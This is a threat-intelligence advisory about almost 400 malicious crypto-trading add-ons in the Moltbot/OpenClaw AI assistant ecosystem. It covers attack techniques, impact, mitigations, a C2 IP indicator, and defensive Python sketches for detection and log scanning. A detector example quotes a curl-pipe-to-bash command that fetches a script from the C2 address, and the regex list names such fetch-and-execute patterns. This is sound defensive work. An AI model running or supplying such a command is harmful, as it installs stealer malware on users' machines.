Hundreds of Malicious Crypto Trading Add-Ons Found in Moltbot/OpenClaw
Almost 400 fake crypto trading add-ons have been discovered in the Moltbot/OpenClaw AI assistant project, potentially leading users to install information-stealing malware. These add-ons, known as skills, masquerade as cryptocurrency trading automation tools and target various platforms. The malicious skills share the same command-and-control infrastructure and use social engineering to convince users to execute commands that steal crypto assets. The supply chain attack relies on social engineering and exploits the absence of security review in the skills publication process. Security experts warn about the inherent risks of endpoint-native AI agents and emphasize the need for proper security controls and architectural design considerations.
AI Analysis
Technical Summary
The threat involves a large-scale supply chain attack targeting the Moltbot/OpenClaw AI assistant project, where almost 400 malicious add-ons (skills) masquerade as legitimate cryptocurrency trading automation tools. These skills are designed to deploy information-stealing malware that targets users' crypto assets. The attack exploits the skills publication process, which lacks adequate security review, enabling attackers to distribute malicious code widely. The malicious skills share a common command-and-control (C2) infrastructure, facilitating coordinated data exfiltration and remote control. Social engineering tactics are heavily employed to convince users to execute commands that compromise their wallets and sensitive information. The attack aligns with MITRE ATT&CK techniques such as T1071 (Application Layer Protocol), T1195 (Supply Chain Compromise), T1555 (Credentials from Password Stores), T1219 (Remote Access Software), T1552 (Unsecured Credentials), T1204 (User Execution), T1199 (Trusted Relationship), and T1056 (Input Capture). The threat highlights the risks of endpoint-native AI agents, which, if not designed with security in mind, can become vectors for malware delivery and data theft. No CVE or known exploits in the wild have been reported yet, but the scale and sophistication suggest a medium-severity threat with potential for significant financial and reputational damage.
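The social engineering step, convincing a user to paste and run a command, can often be caught with simple static heuristics. The sketch below is illustrative only: the patterns and the `assess_command` helper are hypothetical, not part of Moltbot/OpenClaw, and real tooling would need a far broader rule set.

```python
import re

# Hypothetical heuristics for flagging risky commands that a malicious
# "skill" might ask a user to execute; patterns are illustrative, not exhaustive.
RISKY_PATTERNS = [
    (re.compile(r"curl[^|]*\|\s*(ba)?sh"), "pipes a remote script into a shell"),
    (re.compile(r"base64\s+(-d|--decode)"), "decodes an obfuscated payload"),
    (re.compile(r"chmod\s+\+x"), "marks a downloaded file executable"),
]

def assess_command(cmd):
    """Return a list of human-readable reasons the command looks risky."""
    return [reason for pat, reason in RISKY_PATTERNS if pat.search(cmd)]

# A command of the shape reported in this campaign would be flagged:
print(assess_command("curl -s http://91.92.242.30/i.sh | bash"))
# ['pipes a remote script into a shell']
```

Heuristics like these are trivially evaded by a motivated attacker, so they complement, rather than replace, the review and sandboxing controls discussed below.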
Potential Impact
European organizations involved in cryptocurrency trading or utilizing AI assistants like Moltbot/OpenClaw face risks including theft of crypto assets, exposure of sensitive credentials, and potential compromise of endpoint systems. Financial losses could be substantial due to direct theft or fraud. The shared C2 infrastructure means that once infected, multiple systems can be controlled remotely, increasing the attack surface and potential for lateral movement. The social engineering aspect increases the likelihood of successful exploitation, especially among users unfamiliar with AI assistant security risks. This threat could undermine trust in AI-driven trading tools and impact regulatory compliance related to data protection and financial security. Additionally, organizations may face operational disruptions if endpoint systems are compromised or if remediation efforts require system downtime. The lack of security review in the add-on publication process indicates a systemic vulnerability that could be exploited repeatedly, affecting the broader European crypto ecosystem.
Mitigation Recommendations
1. Implement strict vetting and security review processes for all AI assistant add-ons or skills before installation, including automated and manual code analysis.
2. Educate users on the risks of social engineering and the importance of verifying the authenticity of crypto trading tools and commands executed via AI assistants.
3. Employ endpoint detection and response (EDR) solutions capable of monitoring unusual command executions and network communications to known malicious C2 IPs such as 91.92.242.30.
4. Restrict AI assistant permissions to the minimum necessary and disable execution of untrusted or unsigned skills.
5. Use multi-factor authentication and hardware wallets for cryptocurrency transactions to reduce the impact of credential theft.
6. Monitor network traffic for signs of data exfiltration or communication with suspicious infrastructure.
7. Collaborate with AI assistant vendors to improve the security architecture, including sandboxing skills and enforcing strict publication policies.
8. Maintain up-to-date threat intelligence feeds and integrate indicators of compromise (IOCs) into security monitoring tools.
9. Conduct regular security awareness training focused on emerging AI-related threats and supply chain risks.
10. Establish incident response plans specifically addressing AI assistant compromise scenarios.
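Monitoring traffic for communication with suspicious infrastructure can be approximated even without an EDR by sweeping connection logs for watchlisted addresses. The sketch below is a minimal, hypothetical example using only the Python standard library: the log format and the `find_c2_hits` helper are assumptions, with the reported C2 IP 91.92.242.30 as the seed IOC.

```python
import re

# Hypothetical IOC watchlist; 91.92.242.30 is the C2 address reported for
# this campaign. Extend the set from your own threat-intelligence feeds.
C2_IPS = {"91.92.242.30"}

IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")

def find_c2_hits(log_lines):
    """Return (line_number, ip) pairs for log lines mentioning a watchlisted IP."""
    hits = []
    for n, line in enumerate(log_lines, start=1):
        for ip in IP_RE.findall(line):
            if ip in C2_IPS:
                hits.append((n, ip))
    return hits

# Illustrative log lines in an assumed "timestamp CONNECT src -> dst:port" shape:
sample = [
    "2026-02-05T11:15:28Z CONNECT 10.0.0.5 -> 93.184.216.34:443",
    "2026-02-05T11:16:02Z CONNECT 10.0.0.7 -> 91.92.242.30:443",
]
print(find_c2_hits(sample))  # [(2, '91.92.242.30')]
```

In practice the same matching logic would be pointed at firewall, proxy, or DNS logs, and a hit would trigger isolation of the source host pending investigation.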
Affected Countries
Germany, United Kingdom, France, Netherlands, Switzerland, Sweden
Indicators of Compromise
- ip: 91.92.242.30
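To integrate this IOC into security monitoring tools, it can be expressed as a STIX 2.1 indicator. A minimal sketch, assuming plain-dict construction rather than a dedicated STIX library; the `ip_indicator` helper is hypothetical.

```python
import json
import uuid
from datetime import datetime, timezone

def ip_indicator(ip, name):
    """Build a minimal STIX 2.1 indicator object for an IPv4 IOC."""
    now = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.000Z")
    return {
        "type": "indicator",
        "spec_version": "2.1",
        "id": f"indicator--{uuid.uuid4()}",
        "created": now,
        "modified": now,
        "name": name,
        "pattern": f"[ipv4-addr:value = '{ip}']",
        "pattern_type": "stix",
        "valid_from": now,
    }

# Wrap the reported C2 address as a shareable indicator:
ioc = ip_indicator("91.92.242.30", "Moltbot/OpenClaw malicious skills C2")
print(json.dumps(ioc, indent=2))
```

The resulting JSON can be bundled and pushed to a TAXII server or imported into a SIEM that accepts STIX content.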
Technical Details
- Author: AlienVault
- TLP: white
- References: https://www.infosecurity-magazine.com/news/malicious-crypto-trading-skills
- Adversary: null
- Pulse ID: 698329ed1fc44cc3c16e1038
- Threat Score: null
Threat ID: 69847bd0f9fa50a62f1a71f2
Added to database: 2/5/2026, 11:15:28 AM
Last enriched: 2/5/2026, 11:29:46 AM
Last updated: 3/23/2026, 7:25:00 AM